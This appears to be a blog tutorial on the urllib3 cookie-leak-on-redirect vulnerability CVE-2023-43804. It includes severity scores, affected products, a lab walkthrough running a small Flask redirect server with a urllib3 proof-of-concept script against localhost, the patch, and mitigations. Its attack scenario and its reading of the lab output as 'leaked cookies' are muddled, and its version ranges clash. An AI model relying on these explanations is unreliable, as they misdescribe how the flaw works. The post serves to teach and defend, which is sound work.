CVE-2023–43804 (Urllib3 Vulnerability)

vsociety

9 min readJun 8, 2024

by@Smartkeyss

Screenshots from the blog posts

PoC video

https://youtu.be/8EZQ9pqYf_k

Summary

CVE-2023–43804 (CVSS 5.9) is classified as a medium-risk vulnerability discovered in the Python library urllib3. urllib3 serves as an HTTP client library responsible for managing HTTP requests. The vulnerability arose from the exposure of cookie information during redirects, as urllib3 was not originally designed to handle such sensitive data.

Description

Introduction

On the 10th of October 2023, it was reported that urllib3 does not treat the Cookie HTTP header as special or provide any helper for managing cookies over HTTP. This means that urllib3 does not automatically manage cookies for you compared to other HTTP clients. If you would like to include cookies in your request, you have to specifically tell urllib3 to do so.

One of the security concerns arises when users include cookies in their request header and the server responds with an HTTP redirect (status code 303) to a different origin or domain. If the user does not explicitly disable redirects, the HTTP client (in this case urllib3) may automatically follow the redirect request. This behavior could unfortunately leak sensitive cookie information to a different domain, potentially exposing sensitive user data to a domain that the user did not intend to interact with.

Urllib3

Urllib3 is an open-source Python library that was initially developed by Audrey Petrov and was released in 2010. Urllib3 is a powerful, user-friendly HTTP client for Python, providing features such as connection pooling, SSL verification, proxy support, and thread safety. It simplifies the process of making HTTP requests and handling responses in Python scripts or applications. Urllib3 is widely used for tasks such as web scraping, API consumption, and interacting with web services. The affected versions are urllib3 version 1.26.16 and below.

CVSS 3.x Severity and Metrics

NIST: NVD

Base Score: 8.1 (HIGH)

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CNA: Github, Inc.

Base Score: 5.9 (MEDIUM)

Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N

Nature of Exploit

Both end-users and developers are vulnerable to this exploit. Users can be exploited by interacting with a phishing link or a malicious website, and developers can be exploited when making HTTP requests if they are not careful with how they handle the requests, especially in scenarios involving redirects and sensitive information such as cookies, which could be used to launch further attacks against affected systems or users. The common weakness enumeration associated with this CVE is CWE-200.

Affected Products

IBM (International Business Machines) mining process was affected by this vulnerability. The affected versions were 1.14.0, 1.14.1, and 1.14.2. The remediation was upgrading the software to version 1.14.3.
IBM (International Business Machines) Watson Assistant for IBM Cloud Pak for Data was affected, and the versions affected were all versions before v4.8.2.
IBM (International Business Machines) AIX was affected, with version v7.3 being impacted.
IBM (International Business Machines) InfoSphere Information Server was affected, with version v11.7 being affected and upgraded to v11.7.1.4.
IBM (International Business Machines) Storage Scale was affected, with versions v5.1.0.0 — v5.1.2.14 and v5.1.3.0 — v5.1.9.0 being impacted. The remediation for IBM Storage Scale v5.1.0.0 — v5.1.2.14 is v5.1.15, while for IBM Storage Scale v5.1.3.0 — v5.1.9.0, it is v5.1.9.1.

Hypothetical Exploit Scenario

A user visits a legitimate website, such as an online banking portal, where they log in and their browser stores session cookies for authentication. Unbeknownst to them, they then visit a malicious website controlled by attackers.

The malicious website contains Python code that utilizes urllib3 to send HTTP requests to the online banking portal on behalf of the user. When the user’s browser loads the malicious site, the Python code running on the server sends an HTTP request to the online banking portal using `urllib3`. This request includes the user's stored cookies for the banking portal, obtained by the attacker through various means (e.g., phishing, cross-site scripting).

urllib3 receives the response from the online banking portal, which may contain sensitive information or actions based on the user's identity (e.g., account balance, transaction history). The Python code on the malicious server extracts relevant information from the response received from the banking portal, such as account details or transaction history.

The attacker can exploit the sensitive information obtained from the banking portal’s response for malicious purposes, such as unauthorized access to the user’s account, identity theft, or fraudulent transactions.

In this scenario, urllib3 is used by the attacker's server-side Python code to send HTTP requests to the legitimate online banking portal, leveraging the user's stored cookies for authentication. This allows the attacker to obtain sensitive information from the banking portal's responses and potentially carry out unauthorized actions on the user's behalf.

Proof of Concept (PoC)

The proof of Concept for this vulnerability is little tricky as one may not consider it a vulnerability at first. But searching deeper I found a PoC by @JawadPy in https://github.com/JawadPy/CVE-2023-43804-Exploit .

In this concept, web application is built using flask and a crafted python code is made to exploit this vulnerability.

Understanding the Code used

From JawadPy PoC, simple web application is made using flask.

from flask import Flask, redirect, url_for
app = Flask(__name__)

@app.route('/')

def index():
    return

redirect("https://google.com", code=301)

if __name__ == '__main__':
    app.run(host="0.0.0.0", debug=True)

In this code, there is a redirect to google.com. This means that when you run the server, it will redirect to google.com.

The python code for the exploit.

import urllib3

url = 'http://127.0.0.1:5000/'
headers = {'Cookie': 'TEST_COOKIE=Anything'}

http = urllib3.PoolManager()
response = http.request('GET', url, headers=headers)

print(
    f"""
    CVE-2023-43804
    You must have URLLib3 version < 2.0.6

    Info:
    Current version: {urllib3.__version__}
    Current Cookie: {headers['Cookie']}
    URL: {url}
    
    Status Code: {response.status}
    Redirected URL: {response.headers.get('Location')}
    """,

    f"\nCookies: {response.getheader('Set-Cookie')}" if 'Set-Cookie' in response.headers else "No leaked cookies"
)

The code uses urllib3 to HTTP request a website or url. It sets up a request with a specific cookie in the headers, then executes a GET request to the provided URL. After receiving the response, it prints out details such as the CVE number, the current version of urllib3, the URL of the request, the status code of the response, and any redirected URL if present. Additionally, it checks if there are any leaked cookies in the response headers and prints them if found.

Lab Setup

For this exploit, I used Python on visual studio code.

Firstly, we start by installing python.

If you’re using Linux, follow the steps

sudo apt update

After that run

sudo apt install python3

Once completed, check the version.

Python3 --version

If it has shown this, then congratulations, you successfully installed python

For those using Windows

Visit https://www.python.org/downloads/ to download .exe file for python.

Click on download python 3.12.2

Then .exe file will start downloading. Once done, run the installer.

Click on the check box to use admin privileges and add python.exe to PATH. Click on install now.

Follow the screen instructions to complete installation.

At the end, you should have this

Click on close, go the command prompt

Run

Python --version

You should get this.

If you did, you have successfully installed python on windows.

Next we install any urllib3 library below version 1.26.16

pip install urllib3==1.26.16

If successful, you should get this 👇👇

Then we install flask for building a simple web app

pip install flask

Once done, we then download Visual Studio Code and Install it.

On VsCode, we clone the exploit code from @jawadpy repository

git clone https://github.com/JawadPy/CVE-2023-43804-Exploit

After cloning, you should have example.py and server.py in your folder.

We would be building a simple web application using Flask in the server.py

Run the the server.py

You should get this if it was successful as it shows the http address.

Copy the http address to your browser and search. You would be automatically redirected to the link you added for redirection. In this case google.com

On VsCode we run the example.py

This is the result gotten

Explaining the result

The first part tells us that getheader has been removed by default in version above v1.26.16.

The second part is print out of information that was needed such as the cve name, current version of urllib3, current cookies etc.

The last part is the interesting part as this is the leaked cookies. Instead of showing cookies for http://127.0.0.1.5000, It will show cookies for the link of the redirection. If a good security measure is not put in place to handle this information from the website part, sensitive cookies information would be leaked. Not much information was leaked because this website _abck cookie for security.

PATCH DIFFING

In the recent update Version 2.0.6 to urllib3's Retry class, a new capability was introduced to improve security when handling HTTP redirects. Specifically, the `Cookie` header was included in the list of headers that will be removed from requests when urllib3 automatically follows a redirect to a different host.

Remember before this update, urllib3 didn't automatically remove any headers when following redirects. However, with the addition of the `Cookie` header to the list of headers to strip by default, urllib3 now ensures that sensitive information like cookies is not forwarded to a different domain during a redirection process.

This enhancement is especially important in scenarios where users interact with websites. For instance, if a user’s browser is redirected from one domain to another, it’s crucial to prevent the transfer of sensitive information such as authentication tokens or session cookies. By removing the `Cookie` header during redirection, urllib3 helps mitigate the risk of unauthorized access or data leakage.

Additionally, developers have the flexibility to specify other headers they want to strip during redirection by utilizing the `Retry.remove_headers_on_redirect` parameter. This allows for fine-grained control over which headers are removed in different scenarios, further enhancing the security posture of applications built with urllib3.

Migitation

To mitigate the risks of HTTP redirects and potential data leakage:

Update urllib3: Ensure urllib3 is updated to the latest version 2.0.6 to address security vulnerabilities like CVE-2023-43804.
Configure Headers: Use `Retry.remove_headers_on_redirect` to specify headers to strip during redirection, especially sensitive ones like cookies.
Enhance Security: Implement additional security measures such as CSP, HSTS, or CORS policies.
Audit and Monitor: Regularly audit HTTP requests and set up monitoring to detect suspicious activity.
User Education: Educate users about the risks of interacting with redirects and encourage reporting of unusual behavior.
Users should be careful to not click on

These steps can reduce the risk of data exposure and strengthen your application’s security.

Final Thought

Although CVE-2023–43804 may not initially appear to be a high-risk vulnerability, when important or sensitive information such as cookies is leaked, it becomes a significant threat.

The positive aspect is that urllib3 quickly addressed this issue by stripping cookies and authorization headers during redirection in the patch. However, it is advisable for developers to also remove any additional headers they consider sensitive.